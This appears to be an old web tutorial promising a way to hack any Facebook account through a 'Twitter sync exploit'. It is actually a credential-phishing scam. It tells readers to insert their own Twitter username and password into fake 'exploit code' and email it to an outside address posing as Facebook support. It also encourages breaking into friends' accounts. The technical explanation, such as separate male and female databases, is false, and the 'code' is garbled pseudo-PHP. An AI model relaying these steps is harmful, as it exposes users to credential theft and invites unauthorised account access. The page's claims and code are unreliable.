?

Learn How To Hack Any FaceBook Account Using A Web Based Exploit
Do you want to learn how to hack facebook?, Are you looking for a way to hack yo
ur friends facebook account without them fiding out? Interested in finding out w
ays to hack someones profile? Maybe you want to take a quick peek at their messa
ge inbox or use a glitch to use a hacking script. In this article I will show yo
u a fairly easy step by step guide on how to hack facebook user accounts without
having to directly hack into facebook and risk getting caught. Ignore all those
hacking services, facebook hacks and hackers that charge you money for somethin
g you can do on your own for free. Hack the password of any of your friends acco
unts and get their password even as a prank or joke (you may also be interested
in trying our How To Hack Twitter Accounts tutorial).
Hack facebook, hacking facebook passwords from user accounts and find out someon
es facebook password...Is any of it really possible? Yes it is, thanks to Twitte
r!. By now, you have probably heard the rumors of how unsafe Facebook is with a
few celebrities having had their accounts hacked. You may also have seen Twitter
allows you to synchronize your tweets with Facebook status updates so whatever
you tweet appears as a Facebook status update. In providing this service, Facebo
ok has created many vulnerabilities for itself by allowing a third party (Twitte
r) to access their database. This problem is due to Facebooks API service which
permits exterior websites or applications (like FarmVille) to modify or post stu
ff on your profile.
A couple of month's ago I wanted to check my old FaceBook account but forgot wha
t email and password I had used to sign up, I sent an email to their technical s
upport but they didn't reply so I decided to put my geek skills to good use and
find a way to get my login information back by writing a facebook account hackin
g code or exploit as they are called.
HOW HACKING FACEBOOK ACCOUNTS WORKS
Facebook has two databases (one for males and one for females users) where they
keep all the information from their users, if you remember the email you use to
login but forget your password, you can use the 'Forgot your password?' option,
however if like me you don't have any of that information it's impossible to leg
ally recover that account.
If you know anything about programming websites you know the 'Forgot your passwo
rd?' service has to be in direct contact with the databases in order to send req
uests to retrieve the forgotten information for you, basically what that means i
s if you 'ask' the database for the login information with the right 'code' (in
our case exploit), it will send you back that information.
So all I had to figure out is what the code was and what system they used to con
tact the databases through the 'Forgot your password?' service, after a few week
s of writing and testing codes I came up with the right one for the job and afte
r doing a bit of research I learned FaceBook uses something similar to an email
service to contact their databases.
For security reasons the databases are programmed to verify the account your req
uesting is actually yours and not someone elses so they need some type of authen
tication or verification (thats why they send you a verification link to your em
ail when creating your account or changing your password).
Luckily for us, as mentioned above, through the use of Twitter combined with Fac
ebooks 'Mutual Friend' feature, we can use a friends account to verify your own,
in other words, if the person you want to get the login information from is on
your friends list on Facebook...you can use your Twitter account to verify your
their friend on Facebook taking advantage of the vulnerability of the twitter st
atus sync exploit, and get their login email and password sent to you. But the v
ictim must be on your friends list on Facebook.
HOW TO DO IT
1) First off you will need to get your user id and the victims user id, how do y
ou do this?
Go to the victims profile, then click on their Display Picture (not the "View Ph
otos of ..." link or tab but the actual main picture of their profile) and look
at your browsers address bar, at the end of all the address you should see a gro
up of numbers that should you should look something like this: (I have used a re
d arrow to point them out)

Don't worry if it isn't exactly like that (sometimes it has variations like; 'al
bum.php?profile=10957800008') just as long as you get the numbers. Write them do
wn somewhere as you will need to use it a bit further down, once that is done yo
u may continue to step 2.
2) At the bottom of this page I have pasted the exploit code I created to fool t
he databases, this is the tricky part as you will have to edit the code a bit yo
urself so that it fits your needs when searching for the victims login informati
on.
Scroll down to the bottom of this page and find the code I have highlighted in g
ray so you know what to copy, select the code and copy it to your clipboard (pre
ss CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit
it.
3) Once you have the code somewhere you can edit it, you will need to insert thr
ee things into it, the facebook user id of the victim and the twitter friend aut
hentication information. I will give you step by step examples by trying the exp
loit code on my friend Laura's account as the victim, see what parts you have to
edit and with what:

1. Should be the victims user id.

2. Should be your twitter login Username (I put my email in the screencap exampl
e above for privacy reasons) to verify your the victims mutual friend on faceboo
k. Make sure your facebook email was the same used to sign up to Twitter so the
exploit script can automatically connect both accounts.
3. Should be your twitter password so the database can authentic you really are
friends with the victim on facebook.
When editing the code, don't accidentally delete one of the quotes (") or it won
't work, so make sure you put the information inside them.
4) Now that you have the exploit code edited and ready to send, we are all set t
o send it to the database through an email, since it's not your regular email bu
t an exploit email we will have to use a special Subject so the database knows h
ow to read it in programming language.
Go to your email address and Compose a new email to fbsupport@techie.com which i
s their customer service email for forgotten passwords, in the Subject copy and
paste the code below highlighted in gray:
$[search_database = $find user+id= "123456789", '%verification+user+bday' =
}"01/01/1900"{ begin_search();

Once you have edited the Subject and entered the email address, your Composed em
ail should look like the screenshot below, I will numerate each item:

1. The email address of the facebook database's forgotten password customer serv
ice.
2. This is where you insert the victims facebook user id.
3. This is where you insert your birthday so the database can find you to verify
your a friend of the victim (it arranges users in the database based on your da
te of birth), NOTE: It MUST be in the MONTH/DAY/YEAR format so it can read it pr
operly.
5) After you have correctly written the To: and Subject sections, you may procee
d to insert the exploit code you previously edited in step 3 into the body secti
on of the email.Now all you have to do is click Send and wait for the database t
o send you back it's reply with the information.
It should take from 12-24 hours depending on the traffic FaceBook has that day,
this is a sample of the email response you'll receive:
THE EXPLOIT CODE
fb_select_db("find", $linkID) or die(fbdatabase_error());
$resultID = fb_query("SELECT FriendID FROM signup WHERE email = '$email'", $
linkID) or die(fbdatabase_error());
$num_rows = db_num_rows($resultID);
$row = facebook_fetch_array($resultID);
$user_id = $row[0];
if ($user_id == "PUTUSERIDHERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password o
f that ID.
}
else {
// print "We're sorry, your friend ID does not appear to be in our database.
"
$passwordfromdb = $row[0];
$find userID = (%friend_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "PUTEMAILHERE"; (%friend_vulnerability_email%)
#user password = "PUTPASSWORDHERE"; (%friend_vulnerability_pass%)
$friend_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email
session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {
}
elseif (empty($email_address)) {
echo $empty_fields_message;
function decrypt userID password() {
 $salt = "abchefghjkmnpqrstuvwxyz0123456789";
srand((double)microtime()*1000000);
$i = 0;
while ($i <= 7) {
$num = decrypt() % 33;
$tmp = substr($salt, $num, 1);
$pass = $pass . $tmp;
$i++;
}
return $pass;
}
mail($email_address, $subject, $message, "Facebook Password Reset Confirmati
on

}
/end$

Code Last Updated: { 11/14/2010 } | [ 132 ] Passowords successfully delivered to

day.
Copyright © Amanda & Andrew O'Keith | l33t g33k's
Site Sponsors sponsor logo sponsor logo sponsor logo WIRED